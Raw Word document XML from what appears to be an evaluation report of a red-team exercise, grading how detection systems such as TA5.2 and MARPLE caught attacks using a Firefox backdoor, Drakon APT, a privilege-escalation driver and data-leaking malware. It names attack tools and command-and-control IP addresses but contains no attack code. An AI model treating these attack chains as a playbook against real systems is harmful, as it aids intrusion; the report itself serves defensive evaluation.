    <w:p w14:paraId="62A1C684" w14:textId="55D4718E" w:rsidR="00365694" w:rsidRDefault="00595032" w:rsidP="00595032">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TA5.2 Overall Detection Accuracies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9E27B" w14:textId="77777777" w:rsidR="00A7276C" w:rsidRDefault="00A7276C" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DFFFF25" w14:textId="031CCD9C" w:rsidR="00A7276C" w:rsidRPr="00FC027E" w:rsidRDefault="002376DB" w:rsidP="00AA267E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="276" w:name="_Toc12600157"/>
      <w:r>
        <w:t xml:space="preserve">05/08/2019 </w:t>
      </w:r>
      <w:r w:rsidR="00A7276C" w:rsidRPr="00FC027E">
        <w:t>12:58 -- TA5.2 Windows 2 -- Firefox Drakon APT Sysinfo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="276"/>
    </w:p>
    <w:p w14:paraId="0CEC84DD" w14:textId="77777777" w:rsidR="00A7276C" w:rsidRDefault="00A7276C" w:rsidP="00A7276C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>TA5.2 reported this attack as Process Injection, triggered by Endgame detection.  They detected and reported the IP address and ports used in the attack, which was IP address 128.55.12.233 and TCP ports 80, 8000, and 443.  These were detected and reported in real-time by Endgame/Splunk.  The activity was attributed to Firefox, which was launched by Microsoft Word.  TA5.2 used Splunk to perform forensic analysis after the fact but was unable to find any more information about the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2E1D55" w14:textId="77777777" w:rsidR="004D3CDA" w:rsidRDefault="004D3CDA" w:rsidP="00A7276C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6320B378" w14:textId="77777777" w:rsidR="00595032" w:rsidRDefault="004D3CDA" w:rsidP="00595032">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="400ED693" wp14:editId="18154C7C">
            <wp:extent cx="4650377" cy="2308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27 at 10.30.33 AM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4704955" cy="2335674"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6094C59D" w14:textId="0B418C2F" w:rsidR="00B31596" w:rsidRDefault="00595032" w:rsidP="00AA267E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TA5.2 Windows attack using Firefox backdoor, Drakon APT, and Sysinfo module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5807A6" w14:textId="77777777" w:rsidR="00AA267E" w:rsidRPr="00AA267E" w:rsidRDefault="00AA267E" w:rsidP="00AA267E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2663EE" w14:textId="6732622A" w:rsidR="00B31596" w:rsidRPr="00FC027E" w:rsidRDefault="002376DB" w:rsidP="00AA267E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="277" w:name="_Toc12600158"/>
      <w:r>
        <w:t xml:space="preserve">05/08/2019 </w:t>
      </w:r>
      <w:r w:rsidR="00B31596" w:rsidRPr="00FC027E">
        <w:t>14:37 -- TA5.2 Windows 1 -- Firefox Drakon APT Elevate Copykatz 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="277"/>
    </w:p>
    <w:p w14:paraId="6156F8D4" w14:textId="77777777" w:rsidR="00B31596" w:rsidRDefault="00B31596" w:rsidP="00B31596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>TA5.2 reported this attack as Process Injection, triggered by Endgame detection.  Similar to the previous attack, they reported that they confirmed the network addresses being but none of the C2 commands being used.  Unlike the previous attack, they forgot to provide the IP and ports used.  Since these were the same as the first attack, it is expected that they detected the same IP and ports, 128.55.12.233 with ports 80, 8000, and 443.  They missed everything that followed, including privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055FF8D9" w14:textId="77777777" w:rsidR="004D3CDA" w:rsidRDefault="004D3CDA" w:rsidP="00B31596">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFD4B8D" w14:textId="77777777" w:rsidR="00595032" w:rsidRDefault="004D3CDA" w:rsidP="00595032">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="195C729D" wp14:editId="6AAF13F1">
            <wp:extent cx="4689566" cy="172509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27 at 10.30.42 AM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4760959" cy="1751353"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0691928F" w14:textId="6CABA676" w:rsidR="00ED047C" w:rsidRDefault="00595032" w:rsidP="00AA267E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TA5.2 Windows attack using Firefox backdoor, Drakon APT, Elevate driver, and Copykatz module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A691B" w14:textId="77777777" w:rsidR="00AA267E" w:rsidRPr="00AA267E" w:rsidRDefault="00AA267E" w:rsidP="00AA267E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331C6BD4" w14:textId="0D219D23" w:rsidR="00ED047C" w:rsidRPr="00FC027E" w:rsidRDefault="002376DB" w:rsidP="00AA267E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="278" w:name="_Toc12600159"/>
      <w:r>
        <w:t xml:space="preserve">05/08/2019 </w:t>
      </w:r>
      <w:r w:rsidR="00ED047C" w:rsidRPr="00FC027E">
        <w:t>15:14 -- TA5.2 Windows 1 -- Firefox Drakon APT Elevate Copykatz 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="278"/>
    </w:p>
    <w:p w14:paraId="63B3DF7C" w14:textId="77777777" w:rsidR="00ED047C" w:rsidRPr="00FC027E" w:rsidRDefault="00ED047C" w:rsidP="00ED047C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>TA5.2 reported this attack as Process Injection, triggered by Endgame detection.  Similar to the previous attack, they forgot to provide the IP and ports used.  Since these were the same as the first attack, it is expected that they detected the same IP and ports, 128.55.12.233 with ports 80, 8000, and 443.  TA5.2 also detected the use of privilege escalation, reporting the new privileges added to the process.  The timestamp on the privilege escalation was off by almost an hour, but the event was still reported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733885B2" w14:textId="59B7FBFD" w:rsidR="00595032" w:rsidRDefault="003A6F0D" w:rsidP="00595032">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7C00F797">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" alt="ta52-1514" style="width:363pt;height:166pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId19" o:title="ta52-1514"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D5A53A" w14:textId="7FB0014A" w:rsidR="00B31596" w:rsidRPr="00FC027E" w:rsidRDefault="00595032" w:rsidP="00595032">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TA5.2 Windows attack using Firefox backdoor, Drakon APT, Elevate driver, and Copykatz module, attempt #2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA4119" w14:textId="77777777" w:rsidR="00A7276C" w:rsidRPr="000112FB" w:rsidRDefault="00A7276C" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308A0216" w14:textId="18F0702C" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00FE6381" w:rsidP="00AA267E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="279" w:name="_Toc12600160"/>
      <w:r w:rsidRPr="000112FB">
        <w:t>MARPLE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="279"/>
    </w:p>
    <w:p w14:paraId="5B0C0619" w14:textId="668F0EF9" w:rsidR="00FE6381" w:rsidRDefault="005F68B4" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">TA2 MARPLE performed had a difficult time discerning benign from malicious activity during the engagement but improved upon that with the </w:t>
      </w:r>
      <w:r w:rsidR="00821808" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">forensic identification of malicious activity.  Most </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>of the</w:t>
      </w:r>
      <w:r w:rsidR="00821808" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> reported </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>events were</w:t>
      </w:r>
      <w:r w:rsidR="00E12CFC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> benign activity or</w:t>
      </w:r>
      <w:r w:rsidR="00821808" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="000E52B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidR="00FE6381" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">up of the </w:t>
      </w:r>
      <w:r w:rsidR="00E12CFC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>vulnerable kernel drivers</w:t>
      </w:r>
      <w:r w:rsidR="00FE6381" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, but movement of files is not in and of itself considered </w:t>
      </w:r>
      <w:r w:rsidR="00821808" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidR="00FE6381" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">.  The actual activity </w:t>
      </w:r>
      <w:r w:rsidR="00821808" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>associated with the files in question and the kernel modules was not identified in real time or in the</w:t>
      </w:r>
      <w:r w:rsidR="00F85BE1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> subsequent forensic analysis.</w:t>
      </w:r>
      <w:r w:rsidR="00F11F66">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  The results were not completely unexpected as the performers had less time for forensic activity, new capabilities to detect, and more realistic benign activity to sift through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E20CC" w14:textId="77777777" w:rsidR="00347934" w:rsidRDefault="00347934" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5591ED" w14:textId="6211A201" w:rsidR="00471B75" w:rsidRDefault="003A6F0D" w:rsidP="00471B75">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="44A03AEF">
          <v:shape id="_x0000_i1025" type="#_x0000_t75" alt="marple" style="width:321pt;height:304pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId20" o:title="marple"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E27CF29" w14:textId="477378E1" w:rsidR="00F85BE1" w:rsidRDefault="00471B75" w:rsidP="00471B75">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TA2 MARPLE Overall Detection Accuracies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D735F5" w14:textId="723F9E58" w:rsidR="00FE6381" w:rsidRDefault="00141067" w:rsidP="000E52B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="280" w:name="_Toc12600161"/>
      <w:r>
        <w:t xml:space="preserve">TA1 </w:t>
      </w:r>
      <w:r w:rsidR="00D6781E">
        <w:t>FiveDirections</w:t>
      </w:r>
      <w:bookmarkEnd w:id="280"/>
    </w:p>
    <w:p w14:paraId="40367BB7" w14:textId="7121143E" w:rsidR="00770E99" w:rsidRPr="00770E99" w:rsidRDefault="00770E99" w:rsidP="00770E99">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770E99">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t xml:space="preserve">Reported </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t xml:space="preserve">the use of ctfhost2.exe run from disk and connecting out for C2, but otherwise missed all of the attack events on FiveDirections throughout the engagement.  There were many false positives reported, as seen below, including the use scp between TA1 hosts.  </w:t>
      </w:r>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">On the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>final day in particular,</w:t>
      </w:r>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> there were several attacks against Five Directions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>with none of them reported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08667316" w14:textId="5D59C98A" w:rsidR="00B87C44" w:rsidRPr="00B87C44" w:rsidRDefault="00770E99" w:rsidP="00B87C44">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5795A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5/15 ctfhost2.exe malware get executed and leaks data to 113.165.213.253.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E59EB20" w14:textId="77777777" w:rsidR="00B87C44" w:rsidRDefault="00770E99" w:rsidP="000E4F27">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="041C9938" wp14:editId="08C158CE">
            <wp:extent cx="5512526" cy="2052368"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="30" name="Picture 30" descr="C:\Users\curt\AppData\Local\Microsoft\Windows\INetCache\Content.Word\marple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urt\AppData\Local\Microsoft\Windows\INetCache\Content.Word\marple5d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2526" cy="2052368"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="776149A4" w14:textId="7C7888BC" w:rsidR="00B87C44" w:rsidRDefault="00B87C44" w:rsidP="00B87C44">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MARPLE-FiveDirections attack with Firefox backdoor, BITS download, and Micro APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBBF7A7" w14:textId="13F894D6" w:rsidR="00770E99" w:rsidRDefault="00770E99" w:rsidP="00770E99">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t>Some of the false positives reported follow:</w:t>
      </w:r>
    </w:p>
